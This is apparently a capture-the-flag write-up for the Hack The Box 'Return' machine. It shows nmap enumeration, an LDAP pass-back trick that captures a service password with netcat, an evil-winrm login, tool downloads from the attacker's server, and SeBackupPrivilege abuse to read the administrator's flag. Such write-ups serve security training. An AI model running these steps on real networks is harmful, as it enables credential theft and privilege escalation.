Enumeration
I run nmap and found some ports open.
❯ ports=$(nmap -p- -T4 -Pn -n 10.129.111.124 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) ❯ echo $ports 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49679,49697 ❯ nmap -sC -sV -Pn -n -p$ports 10.129.111.124 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 22:55 BST Nmap scan report for 10.129.111.124 Host is up (0.056s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: HTB Printer Admin Panel | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-08 21:14:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49697/tcp open msrpc Microsoft Windows RPC Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2022-05-08T21:15:18 |_ start_date: N/A |_clock-skew: -41m25s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required
I first go to check the web on the port 80, is a printer admin panel. I go to the “settings” tab and found some info about the printer, the server address, port and username:
I also made a scan with nikto, and scan directories with gobuster, but nothing interesting show up.
I check the smb also, and found a printer:
❯ crackmapexec smb 10.129.111.124 SMB 10.129.111.124 445 PRINTER [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
User flag
The settings page on the web seems interesting, so I explored it a little. At first glance the “Update” button doesn’t appear to do anything, so I started burpsuite to see if the button is actually sending something. It seems the button is sending a POST request with only the ip, so the other fields are just for decoration:
I tried to put my ip address on the “server address” field, and start tcpdump to see if any packet is received. And as I expected I receive some packages, seems like the server is trying to do something.
❯ sudo tcpdump -i tun0 port 389 tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 00:01:25.580400 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [SEW], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0 00:01:25.580436 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1735226943, win 0, length 0 00:01:26.148466 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0 00:01:26.148504 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0 00:01:26.714128 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0 00:01:26.714169 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0 ^C 6 packets captured 6 packets received by filter 0 packets dropped by kernel
I started a netcat listener on the port 398, and I opened wireshark to see more detailed info of the packages.
❯ sudo nc -lvvnp 389
[sudo] password for user:
listening on [any] 389 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.111.124] 60243
0*`%return\svc-printer�
1edFg43012!!
Seems like netcat captured something, we know “svc-printer” is an user, and “1edFg43012!!” seems like a password. I opened the packet on wireshark to see it more clearly:
So indeed, “1edFg43012!!” is the password. I will try to connect to the machine using evil-winrm:
❯ evil-winrm -i 10.129.111.124 -u svc-printer -p '1edFg43012!!' Evil-WinRM shell v3.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-printer\Documents>
It worked, so first I took the user flag.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> dir ..\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/8/2022 2:12 PM 34 user.txt
Root flag
First I tried to list smb shares using the “svc-printer” user, but nothing interesting:
❯ crackmapexec smb 10.129.111.124 --shares -u svc-printer -p '1edFg43012!!' SMB 10.129.111.124 445 PRINTER [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) SMB 10.129.111.124 445 PRINTER [+] return.local\svc-printer:1edFg43012!! SMB 10.129.111.124 445 PRINTER [+] Enumerated shares SMB 10.129.111.124 445 PRINTER Share Permissions Remark SMB 10.129.111.124 445 PRINTER ----- ----------- ------ SMB 10.129.111.124 445 PRINTER ADMIN$ READ Remote Admin SMB 10.129.111.124 445 PRINTER C$ READ,WRITE Default share SMB 10.129.111.124 445 PRINTER IPC$ READ Remote IPC SMB 10.129.111.124 445 PRINTER NETLOGON READ Logon server share SMB 10.129.111.124 445 PRINTER SYSVOL READ Logon server share
Time for an enumeration, I uploaded winpeas.exe and execute it.
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/winPEASx64.exe -OutFile winpeas.exe *Evil-WinRM* PS C:\Users\svc-printer\Desktop> .\winpeas.exe
Found something interesting, we are part of the “BUILTIN/Server Operators” group, we can also check this with the “whoami” command:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 *Evil-WinRM* PS C:\Users\svc-printer\Desktop>
Searching on google for a way of privesc taking advantage of the fact that we are part of the “Server Operators” group I found this page by \\Cube0x0\ which explains two ways of privesc for this group users. The first privesc that Cube0x0 explain is for reading sensitive files, because we only want the root flag, that should work for us.
I wil first download the two needed .dll from the suggested repository and start the http server to upload them to the target machine:
❯ git clone https://github.com/giuliano108/SeBackupPrivilege.git [...] ❯ cd SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug ❯ ls -la Permissions Size User Date Modified Name .rw-r--r-- 12k user 9 May 1:02 SeBackupPrivilegeCmdLets.dll .rw-r--r-- 16k user 9 May 1:02 SeBackupPrivilegeUtils.dll ❯ python3 -m http.server 8080 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Now I downloaded them on the target:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeCmdLets.dll -OutFile SeBackupPrivilegeCmdLets.dll *Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeUtils.dll -OutFile SeBackupPrivilegeUtils.dll
I followed the steps on the Cube0x0 guide and imported both .dll:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll *Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
Now I should be able to traverse (cd into) any directory, local or remote, and list (dir, Get-ChildItem) its contents, so I try to move on to the Administrator home:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\Users\Administrator\Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/8/2022 2:12 PM 34 root.txt
There is the root flag, but we can’t just type root.txt because we don’t have permissions. Fortunately for my sake, Cube0x0 explains how to read files taking advantage of this vulnerability I just exploited.
I will need to act as a “Backup” software and copy the file to another folder.
To achieve this I need to use the Copy-FileSeBackupPrivilege module we just imported, then I will be able to read it:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt C:\windows\temp\root.txt -Overwrite
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type C:\windows\temp\root.txt
{flag}
And that’s my flag!
NOTE: In the Cube0x0 guide there is another way to achieve LPE, that way will grant you a cmd as system. If you are curious I encourage you to try it, because of course, a cmd as system is way more useful than just list and/or read any directory/file on the system.